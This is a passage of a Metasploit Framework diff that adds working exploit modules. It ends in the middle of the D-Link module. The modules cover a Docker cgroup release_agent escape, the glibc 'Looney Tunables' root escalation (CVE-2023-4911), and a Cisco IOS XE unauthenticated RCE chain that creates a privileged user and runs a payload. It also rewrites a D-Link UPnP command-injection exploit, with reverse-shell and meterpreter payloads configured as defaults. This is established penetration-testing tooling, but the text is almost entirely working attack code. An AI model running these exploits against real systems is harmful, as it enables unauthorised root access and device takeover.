+ line.split(',').each do |parameter|
+ next unless parameter.start_with?('upperdir')
+
+ parameter = parameter.split('=')
+ fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') unless parameter.length > 1
+ host_path = parameter[1]
+ end
+ break
+ end
+
+ fail_with(Failure::UnexpectedReply, 'Unable to determine docker image path on host OS') if host_path.nil? || host_path.empty? || host_path.start_with?('sed') # start_with catches repeat of command
+
+ vprint_status("Host OS path for image: #{host_path}")
+
+ payload_path = "#{base_dir}/#{rand_text_alphanumeric(5..10)}"
+ print_status("Setting release_agent path to: #{host_path}#{payload_path}")
+ write_file "#{@mount_dir}/release_agent", "#{host_path}#{payload_path}"
+
+ print_status("Uploading payload to #{payload_path}")
+ if target.name == 'CMD'
+ # for whatever reason it's unhappy and wont run without the /bin/sh header
+ upload_and_chmodx payload_path, "#!/bin/sh\n#{payload.encoded}\n"
+ elsif target.name == 'BINARY'
+ upload_and_chmodx payload_path, generate_payload_exe
+ end
+ register_files_for_cleanup(payload_path)
+
+ print_status("Triggering payload with command: sh -c \"echo \$\$ > #{group_full_dir}/cgroup.procs\"")
+ cmd_exec(%(sh -c "echo \$\$ > '#{group_full_dir}/cgroup.procs'"))
+ end
+
+ def cleanup
+ if @mount_dir
+ vprint_status("Cleanup: Unmounting #{@mount_dir}")
+ cmd_exec("umount '#{@mount_dir}'")
+ end
+ super
+ end
+end
diff --git a/modules/exploits/linux/local/glibc_tunables_priv_esc.rb b/modules/exploits/linux/local/glibc_tunables_priv_esc.rb
new file mode 100644
index 0000000000..cf7a401b7c
--- /dev/null
+++ b/modules/exploits/linux/local/glibc_tunables_priv_esc.rb
@@ -0,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ # includes: is_root?
+ include Msf::Post::Linux::Priv
+ # includes: kernel_release
+ include Msf::Post::Linux::Kernel
+ # include: get_sysinfo
+ include Msf::Post::Linux::System
+ # includes writable?, upload_file, upload_and_chmodx, exploit_data, cd
+ include Msf::Post::File
+ # includes register_files_for_cleanup
+ include Msf::Exploit::FileDropper
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ BUILD_IDS = {
+ '69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
+ '3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
+ 'a99db3715218b641780b04323e4ae5953d68a927' => 561,
+ 'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
+ '61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
+ '9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
+ 'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
+ '956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
+ }
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)',
+ 'Description' => %q{
+ A buffer overflow exists in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES
+ environment variable. This issue allows an local attacker to use maliciously crafted GLIBC_TUNABLES when
+ launching binaries with SUID permission to execute code in the context of the root user.
+
+ This module targets glibc packaged on Ubuntu and Debian. The specific glibc versions this module targets are:
+
+ Ubuntu:
+ 2.35-0ubuntu3.4 > 2.35
+ 2.37-0ubuntu2.1 > 2.37
+ 2.38-1ubuntu6 > 2.38
+
+ Debian:
+ 2.31-13-deb11u7 > 2.31
+ 2.36-9-deb12u3 > 2.36
+
+ Fedora 37 and 38 and other distributions of linux also come packaged with versions of glibc vulnerable to CVE-2023-4911
+ however this module does not target them.
+ },
+ 'Author' => [
+ 'Qualys Threat Research Unit', # discovery
+ 'blasty ', # PoC
+ 'jheysel-r7' # msf module
+ ],
+ 'References' => [
+ ['CVE', '2023-4911'],
+ ['URL', 'https://haxx.in/files/gnu-acme.py'],
+ ['URL', 'https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt'],
+ ['URL', 'https://security-tracker.debian.org/tracker/CVE-2023-4911'],
+ ['URL', 'https://ubuntu.com/security/CVE-2023-4911']
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => [ 'linux', 'unix' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'Privileged' => true,
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PrependSetresgid' => true,
+ 'PrependSetresuid' => true,
+ 'WfsDelay' => 600
+ },
+ 'DisclosureDate' => '2023-10-03',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE, ],
+ 'SideEffects' => [ ],
+ 'Reliability' => [ REPEATABLE_SESSION, ]
+ }
+ )
+ )
+ register_advanced_options([
+ OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
+ ])
+ end
+
+ def find_exec_program
+ %w[python python3].select(&method(:command_exists?)).first
+ rescue StandardError => e
+ fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")
+ end
+
+ def check
+ glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first
+ return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version
+
+ sysinfo = get_sysinfo
+ case sysinfo[:distro]
+ when 'ubuntu'
+ # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility
+ test_version = glibc_version.gsub(/-\d+ubuntu/, '.')
+ if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||
+ Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||
+ Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))
+ return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
+ end
+ when 'debian'
+ # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility
+ test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')
+ if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||
+ Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))
+ return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")
+ end
+ else
+ return CheckCode::Unknown('The module has not been tested against this Linux distribution')
+ end
+ CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")
+ end
+
+ def check_ld_so_build_id
+ # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
+ if !command_exists?('file')
+ print_warning('Unable to locate the `file` command ti order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')
+ return
+ end
+ file_cmd_output = ''
+
+ # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
+ # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.
+ sysinfo = get_sysinfo
+ case sysinfo[:distro]
+ when 'ubuntu'
+ if command_exists?('ldconfig')
+ file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')
+ end
+ when 'debian'
+ file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')
+ else
+ fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
+ end
+
+ if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
+ build_id = Regexp.last_match(1)
+ if BUILD_IDS.keys.include?(build_id)
+ print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
+ else
+ fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
+ end
+ else
+ print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')
+ end
+ end
+
+ def exploit
+ fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?
+
+ python_binary = find_exec_program
+ fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
+ vprint_status("Using '#{python_binary}' to run the exploit")
+
+ check_ld_so_build_id
+
+ # The python script assumes the working directory is the one we can write to.
+ cd(datastore['WritableDir'])
+ shell_code = payload.encoded.unpack('H*').first
+
+ exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')
+ exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)
+ exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
+
+ # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
+ output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
+ if output.blank?
+ print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
+ else
+ print_line(output)
+ end
+ end
+end
diff --git a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
new file mode 100644
index 0000000000..a2ae8f987d
--- /dev/null
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -0,0 +1,218 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HTTP::CiscoIosXe
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Retry
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Cisco IOX XE Unauthenticated RCE Chain',
+ 'Description' => %q{
+ This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE
+ devices which have the Web UI exposed. An attacker can execute a payload with root privileges.
+
+ The vulnerable IOS XE versions are:
+ 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,
+ 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,
+ 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,
+ 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,
+ 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,
+ 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,
+ 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,
+ 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,
+ 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,
+ 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,
+ 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,
+ 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,
+ 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,
+ 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,
+ 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,
+ 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,
+ 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,
+ 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,
+ 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,
+ 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
+ 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
+ 17.11.99SW
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'sfewer-r7', # MSF Exploit
+ ],
+ 'References' => [
+ ['CVE', '2023-20198'],
+ ['CVE', '2023-20273'],
+ # Vendor advisories.
+ ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],
+ ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],
+ # Vendor list of (205) vulnerable versions.
+ ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],
+ # Technical details on CVE-2023-20198.
+ ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],
+ ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],
+ # Technical details on CVE-2023-20273.
+ ['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'],
+ # Full details of a successful exploitation attempt from a honey pot.
+ ['URL', 'https://gist.github.com/rashimo/a0ef01bc02e5e9fdf46bc4f3b5193cbf'],
+ ],
+ 'DisclosureDate' => '2023-10-16',
+ 'Privileged' => true,
+ 'Platform' => %w[linux unix],
+ 'Arch' => [ARCH_CMD],
+ 'Targets' => [
+ [
+ # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:
+ # cmd/linux/http/x64/meterpreter/reverse_tcp
+ # cmd/linux/http/x64/shell/reverse_tcp
+ # cmd/linux/http/x86/shell/reverse_tcp
+ 'Linux Command',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_CMD]
+ },
+ ],
+ [
+ # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:
+ # cmd/unix/python/meterpreter/reverse_tcp
+ # cmd/unix/reverse_bash
+ 'Unix Command',
+ {
+ 'Platform' => 'unix',
+ 'Arch' => [ARCH_CMD]
+ },
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'RPORT' => 443,
+ 'SSL' => true
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS]
+ }
+ )
+ )
+
+ register_options(
+ [
+ # We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of
+ # 'global' should work, but exposing this as an option will allow for usage in more complex network setups.
+ # A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to
+ # inspect a devices configuration to see an appropriate VRF to use.
+ OptString.new('CISCO_VRF_NAME', [ true, "The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.", 'global']),
+ # We may need to try and execute a command a second time if it fails the first time. This option is the maximum
+ # number of seconds to keep trying.
+ OptInt.new('CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30])
+ ]
+ )
+ end
+
+ def check
+ # First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with
+ # the Web UI exposed (which is the vulnerable component).
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri('webui')
+ )
+
+ return CheckCode::Unknown('Connection failed') unless res
+
+ # We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.
+ if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com'))
+ return CheckCode::Unknown('Web UI not detected')
+ end
+
+ # By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,
+ # so if this request succeeds, then we known the target is vulnerable.
+ res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)
+
+ # If the above request failed, then the target is safe.
+ return CheckCode::Safe unless res
+
+ version = 'Cisco IOS XE Software'
+
+ # If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable
+ # (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format
+ # for the version information so our regex wont work.
+ # Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2
+ if res =~ /(Cisco IOS XE Software, Version \S+\.\S+\.\S+)/
+ version = Regexp.last_match(1)
+ end
+
+ CheckCode::Vulnerable(version)
+ end
+
+ def exploit
+ admin_username = rand_text_alpha(8)
+ admin_password = rand_text_alpha(8)
+
+ # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.
+ unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)
+ fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
+ end
+
+ begin
+ print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")
+
+ # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...
+
+ # A shell script to execute the Metasploit payload. Will delete itself upon execution.
+ bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
+
+ # The location of our bootstrap script.
+ bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
+
+ # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and
+ # 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.
+
+ # Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems
+ # with restricted chars, and leverage openssl to decode and write the contents to disk.
+ success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+ next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", admin_username, admin_password)
+ end
+
+ unless success
+ fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')
+ end
+
+ # Make the script executable.
+ success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+ next run_os_command("chmod +x #{bootstrap_file}", admin_username, admin_password)
+ end
+
+ unless success
+ fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')
+ end
+
+ # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by
+ # default. The VRF allows the executed script to route its network traffic back the the framework. The map_chvrf.sh
+ # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.
+ success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+ next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", admin_username, admin_password)
+ end
+
+ unless success
+ fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')
+ end
+ ensure
+ print_status("Removing user '#{admin_username}'")
+
+ # Leverage CVE-2023-20198 to remove the admin account we previously created.
+ unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)
+ print_warning('Failed to remove user')
+ end
+ end
+ end
+
+end
diff --git a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
index 6cf8b68fe7..e772d094a3 100644
--- a/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
+++ b/modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
@@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::Udp
include Msf::Exploit::CmdStager
+ include Msf::Module::Deprecated
+
+ deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead')
def initialize(info = {})
super(update_info(info,
diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
index 80e064204f..68456d2078 100644
--- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
+++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
@@ -6,142 +6,377 @@
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
+ include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
+ include Msf::Exploit::Remote::Udp
+ prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
- super(update_info(info,
- 'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
- 'Description' => %q{
- Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
- requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip
- has initially reported the DIR-815 vulnerable. Probably there are other devices also
- affected.
- },
- 'Author' =>
- [
- 'Zachary Cutlip', # Vulnerability discovery and initial exploit
- 'Michael Messner ' # Metasploit module and verification on other routers
+ super(
+ update_info(
+ info,
+ 'Name' => 'D-Link Unauthenticated Remote Command Execution using UPnP via a special crafted M-SEARCH packet.',
+ 'Description' => %q{
+ A command injection vulnerability exists in multiple D-Link network products, allowing an attacker
+ to inject arbitrary command to the UPnP via a crafted M-SEARCH packet.
+ Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900.
+ An attacker can perform a remote command execution by injecting the payload into the
+ `Search Target` (ST) field of the SSDP M-SEARCH discover packet.
+ After successful exploitation, an attacker will have full access with `root` user privileges.
+
+ NOTE: Staged meterpreter payloads might core dump on the target, so use stage-less meterpreter payloads
+ when using the Linux Dropper target. Some D-Link devices do not have the `wget` command so
+ configure `echo` as flavor with the command set CMDSTAGER::FLAVOR echo.
+
+ The following D-Link network products and firmware are vulnerable:
+ - D-Link Router model GO-RT-AC750 revisions Ax with firmware v1.01 or older;
+ - D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
+ - D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
+ - D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
+ - D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
+ - D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
+ - D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
+ - D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
+ - D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
+ - D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
+ - D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
+ - D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
+ - D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older;
+ - D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
+ - D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
+ - D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
+ - D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
+ - D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
+ - D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
+ - D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
+ - D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
+ - D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
+ - D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
+ - D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
+ - D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
+ - probably more looking at the scale of impacted devices :-(
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'h00die-gr3y ', # MSF module contributor
+ 'Zach Cutlip', # Discovery of the vulnerability
+ 'Michael Messner ',
+ 'Miguel Mendez Z. (s1kr10s)',
+ 'Pablo Pollanco (secenv)',
+ 'Naihsin https://github.com/naihsin'
+
],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
- ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
+ 'References' => [
+ ['CVE', '2023-33625'],
+ ['CVE', '2020-15893'],
+ ['CVE', '2019-20215'],
+ ['URL', 'https://attackerkb.com/topics/uqicA23ecz/cve-2023-33625'],
+ ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'],
+ ['URL', 'https://medium.com/@s1kr10s/d-link-dir-859-unauthenticated-rce-in-ssdpcgi-http-st-cve-2019-20215-en-2e799acb8a73'],
+ ['URL', 'https://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'],
+ ['URL', 'https://research.loginsoft.com/vulnerability/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/'],
+ ['URL', 'https://github.com/naihsin/IoT/blob/main/D-Link/DIR-600/cmd%20injection/README.md']
],
- 'DisclosureDate' => '2013-02-01',
- 'Privileged' => true,
- 'Targets' =>
- [
- [ 'MIPS Little Endian',
+ 'DisclosureDate' => '2013-02-01',
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+ 'Privileged' => true,
+ 'Targets' => [
+ [
+ 'Unix Command',
{
- 'Platform' => 'linux',
- 'Arch' => ARCH_MIPSLE
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_cmd,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd'
+ }
}
],
- [ 'MIPS Big Endian', # unknown if there are big endian devices out there
+ [
+ 'Linux Dropper',
{
'Platform' => 'linux',
- 'Arch' => ARCH_MIPSBE
+ 'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE],
+ 'Type' => :linux_dropper,
+ 'CmdStagerFlavor' => ['echo', 'wget'],
+ 'Linemax' => 900,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'
+ }
}
]
],
- 'DefaultTarget' => 0
- ))
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'RPORT' => 1900,
+ 'SSL' => false
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+ register_options([
+ OptString.new('URN', [true, 'Set URN payload', 'urn:device:1']),
+ OptPort.new('HTTP_PORT', [true, 'The HTTP port for the HTTP and SOAP requests sent to detect versions', 80])
+ ])
+ end
- register_options(
- [
- Opt::RHOST(),
- Opt::RPORT(1900)
- ])
+ def vuln_version?(res)
+ # checks the model, firmware and hardware version
+ @d_link = { 'product' => nil, 'firmware' => nil, 'hardware' => nil, 'arch' => nil }
+ html = Nokogiri.HTML(res.body, nil, 'UTF-8')
- deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+ # USE CASE #1: D-link devices with static HTML pages with model and version information
+ # class identifiers: , and
+ # See USE CASE #4 for D-link devices that use javascript to dynamically generate the model and firmware version
+ product = html.css('span[@class="product"]')
+ @d_link['product'] = product[0].text.split(':')[1].strip unless product[0].nil?
+ firmware = html.css('span[@class="version"]')
+ @d_link['firmware'] = firmware[0].text.split(':')[1].strip.delete(' ') unless firmware[0].nil?
+
+ # DIR-600, DIR-300 hardware B revision and maybe other models are using the "version" class tag for both firmware and hardware version
+ @d_link['hardware'] = firmware[1].text.split(':')[1].strip unless firmware[1].nil?
+ # otherwise search for the "hwversion" class tag
+ hardware = html.css('span[@class="hwversion"]')
+ @d_link['hardware'] = hardware[0].text.split(':')[1].strip unless hardware[0].nil?
+
+ # USE CASE #2: D-link devices with static HTML pages with model and version information
+ # class identifiers: , and
+ if @d_link['product'].nil?
+ product = html.css('div[@class="pp"]')
+ @d_link['product'] = product[0].text.split(':')[1].strip unless product[0].nil?
+ firmware = html.css('div[@class="fwv"]')
+ @d_link['firmware'] = firmware[0].text.split(':')[1].strip.delete(' ') unless firmware[0].nil?
+ hardware = html.css('div[@class="hwv"]')
+ @d_link['hardware'] = hardware[0].text.split(':')[1].strip unless hardware[0].nil?
+ end
+
+ # USE CASE #3: D-link devices with html below for model, firmware and hardware version
+ # Product Page : DIR-300 |
+ # Hardware Version : rev N/A |
+ # Firmware Version : 1.06 |
+ if @d_link['product'].nil?
+ hwinfo_table = html.css('td')
